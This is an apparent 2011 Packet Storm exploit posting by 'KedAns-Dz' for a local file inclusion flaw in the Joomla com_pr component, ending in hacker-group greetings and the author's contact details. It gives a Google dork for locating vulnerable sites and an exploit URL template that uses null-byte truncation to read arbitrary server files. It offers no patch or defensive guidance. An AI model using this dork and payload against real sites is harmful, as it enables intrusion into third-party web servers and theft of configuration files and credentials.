Joomla PR Local File Inclusion

2011-03-08T00:00:00
ID PACKETSTORM:99085
Type packetstorm
Reporter KedAns-Dz
Modified 2011-03-08T00:00:00

Description

                                        
                                            `###  
# Title : Joomla Component (com_pr) Local File Inclusion Vulnerability  
# Author : KedAns-Dz  
# E-mail : ked-h@hotmail.com  
# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)  
# Twitter page : twitter.com/kedans  
# platform : php  
# Impact : Local File Inclusion  
# Tested on : Windows XP sp3 FR  
###  
# Note : BAC 2011 Enchallah ( Me & BadR0 & Dr.Ride & Red1One & XoreR & Fox-Dz ... all )  
###  
# Go0gle Dork : inurl:com_pr  
###  
  
Demo:  
  
http://[Target]/[Path]/index.php?Q=/vwar/joomla/components/com_extcalendar//index.php?option=com_pr  
  
Explo!t :   
  
http://[Target]/[Path]/index.php?Q=[LFI]%00  
  
#================[ Exploited By KedAns-Dz * HST-Dz * ]=========================  
# GreetZ to : Islampard * Dr.Ride * Zaki.Eng * BadR0 * NoRo FouinY * Red1One  
# XoreR * Mr.Dak007 * Hani * TOnyXED * Fox-Dz * Massinhou-Dz ++ all my friends ;  
# > Algerians < [D] HaCkerS-StreeT-Team [Z] > Hackers <  
# My Friends on Facebook : Nayla Festa * Dz_GadlOl * MatmouR13 ...all Others  
# 4nahdha.com : TitO (Dr.Ride) * MEN_dz * Mr.LAK (Administrator) * all members ...  
# sec4ever.com members Dz : =>>  
# Ma3sTr0-Dz * Indoushka * MadjiX * BrOx-Dz * JaGo-Dz ... all Others  
# hotturks.org : TeX * KadaVra ... all Others  
# Kelvin.Xgr ( kelvinx.net)  
#===========================================================================  
`